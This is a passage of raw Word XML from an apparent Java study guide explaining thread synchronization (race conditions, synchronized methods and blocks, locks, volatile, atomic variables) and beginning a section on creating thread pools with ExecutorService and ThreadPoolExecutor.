      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5CCBEA"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607D06F"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4190E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1E2AF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F2410C"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If two threads call increment() simultaneously, without synchronization, the result may be incorrect because both threads might read the same value of count, increment it, and then write it back, losing the updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB62B4C" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>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Preventing Race Conditions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when two or more threads access shared resources in an unpredictable order, causing unintended or incorrect behavior. Synchronization helps avoid race conditions by ensuring that only one thread can access the critical section of code at any given time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7D674"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Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If two threads are attempting to increment the same variable at the same time without synchronization, the updates may conflict with each other, causing the variable to have a final value that doesn't reflect both increments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB03CC" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>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lastRenderedPageBreak/>
        <w:t>Atomic Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atomicity refers to performing an operation in such a way that no other thread can interrupt the operation. Thread synchronization ensures atomicity for critical sections of code. For example, if a thread reads, modifies, and writes back a value, synchronization ensures that the entire sequence of operations is completed without interruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2D72E9" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>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Maintaining Data Integrity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> In multithreaded applications, when multiple threads perform different tasks on the same data, synchronization ensures that each thread works in isolation without interfering with others, preserving the integrity of the shared data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E519F"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Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If multiple threads are adding elements to a shared list, synchronization ensures that only one thread can modify the list at a time, preventing invalid states such as IndexOutOfBoundsException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AE4011" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>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Ensuring Consistent Behavior in Multithreaded Applications:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When building complex multithreaded applications, it's crucial to ensure that the threads work in a coordinated manner. Without synchronization, the application might exhibit erratic or unexpected behavior due to threads competing for resources. Synchronization ensures that threads execute their tasks in a predictable manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC9708" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>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Deadlock Prevention (to some extent):</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> While synchronization itself can lead to deadlocks if not handled carefully, it also helps in preventing inconsistent thread interactions. Proper synchronization mechanisms, such as lock acquisition and release in a specific order, can help avoid deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349AD2FE"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How Thread Synchronization Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D1FE2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>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synchronized Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DCF120" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>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The synchronized keyword in Java is used to ensure that only one thread can execute a block of code or method at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471B322A" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>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It can be used to lock a method or a block of code to make it thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960516B"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Example (Method Synchronization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F205FBE"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class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1805EF31"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5E552" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2B4F4E"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 Synchronized method to ensure only one thread can access it at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E5F58"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public synchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC7E1F"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF4C37"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BDBD5" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFD4BFB"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58883F"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F84DE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B492A64"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC0DD3"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Example (Block Synchronization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB4D23"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class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B30BA"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F91075" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF93DE2"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public void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC7D7B9"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synchronized (this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABBF21"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0368C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C95F85"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18622FCF" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D0DE69"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF11D31"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F9995F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DB0AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF8430"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Other Synchronization Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEE6C6" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>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Reentrant Locks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D822C2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1207"/>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ReentrantLock in java.util.concurrent.locks package provides more advanced locking capabilities, such as trying to acquire a lock without blocking, timed locking, and interruptible locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA245F" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>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Volatile Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53123DAE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1207"/>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The volatile keyword ensures that changes made to a variable by one thread are immediately visible to other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD52F13" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>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Atomic Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BD732" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1207"/>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lastRenderedPageBreak/>
        <w:t>Classes in java.util.concurrent.atomic (like AtomicInteger, AtomicLong) allow for atomic operations without explicit synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB9D91" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>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Read-Write Locks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD875A7" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1207"/>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In cases where read operations are more frequent than write operations, a ReadWriteLock (also available in java.util.concurrent.locks) allows multiple threads to read shared data simultaneously but ensures exclusive access when writing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26676D"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A9FB0"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Thread synchronization is necessary to avoid issues such as data corruption, race conditions, and inconsistent behavior when multiple threads access shared resources. It helps in ensuring that data remains consistent, provides atomic operations, and ensures safe and predictable execution in multithreaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C0F57" w14:textId="2A064016" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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643970A">
          <v:rect id="_x0000_i1854" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="595D1649" w14:textId="77777777" w:rsidR="00A36E93" w:rsidRPr="00CE4B95" w:rsidRDefault="00A36E93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="_Toc196307765"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create a Thread pool in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p w14:paraId="13B8B6D5" w14:textId="4CCB30B2" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Java, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a collection of worker threads that are used to execute tasks concurrently. The purpose of a thread pool is to manage a set of threads for executing multiple tasks, ensuring better resource management and improved performance compared to creating new threads for every task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304ABBE2"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Creating a Thread Pool in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1690EA"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Java provides several ways to create a thread pool, mainly using the ExecutorService interface from the java.util.concurrent package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C22340"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Here are the steps to create and use a thread pool in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCEF13D"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1. Using Executors class to create a thread pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09AAB2"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The Executors class in Java provides several static methods to create different types of thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6510C"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFFFCC"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC4DEB2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A0253D"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC16615"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C76140F"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC7AE3"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System.out.println(Thread.currentThread().getName() + " is executing task");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73331E9E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A9088"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF77211" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DFED04"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public class ThreadPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694693B"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695A773"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 Creating a fixed-size thread pool with 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364594ED"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ExecutorService threadPool = Executors.newFixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F0E7C" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8B7B73"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 Submitting tasks to the thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B9A6F"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for (int i = 0; i &lt; 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47305BE1"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threadPool.submit(new MyRunnable());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2541B27D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64692087" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3011C0F2"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 Shutting down the thread pool after task completion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423DEF4"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threadPool.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D04B7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1AC4A8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F75B9D"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Types of Thread Pools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A82762B" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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Fixed Thread Pool (newFixedThreadPool(int nThreads)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC2B2F" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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Creates a thread pool with a fixed number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A118291" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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Useful when you want to limit the number of threads and ensure all threads are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCABC02" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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ExecutorService fixedThreadPool = Executors.newFixedThreadPool(4); // 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B6F91" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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Cached Thread Pool (newCachedThreadPool()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13FB84" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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Creates a thread pool that creates new threads as needed but will reuse previously constructed threads when they are available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5023E" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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Ideal for applications with many short-lived tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853F823" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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ExecutorService cachedThreadPool = Executors.newCachedThreadPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28633AF8" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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lastRenderedPageBreak/>
        <w:t>Single Thread Executor (newSingleThreadExecutor()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DA1749" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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Creates a thread pool with a single worker thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC012C" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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All tasks are executed sequentially in the order they are submitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585AA90" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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ExecutorService singleThreadExecutor = Executors.newSingleThreadExecutor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED1BEC" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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Scheduled Thread Pool (newScheduledThreadPool(int corePoolSize)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54FCC1" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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Creates a thread pool that can schedule tasks to run after a delay or periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29717805" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>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Useful for running periodic tasks like scheduled tasks or fixed-rate executions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01160DB2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>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ScheduledExecutorService scheduledThreadPool = Executors.newScheduledThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461809C8"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2. Creating a custom thread pool with ThreadPoolExecutor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C0644"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If you need more control over the behavior of the thread pool (such as setting the queue size, thread timeouts, etc.), you can create a custom thread pool using the ThreadPoolExecutor class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C91E04"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E916BF3"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE723B7" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D52068A"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED1948E"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093CDCD0"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEFC723"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System.out.println(Thread.currentThread().getName() + " is executing task");</w:t>
      </w:r>
    </w:p>
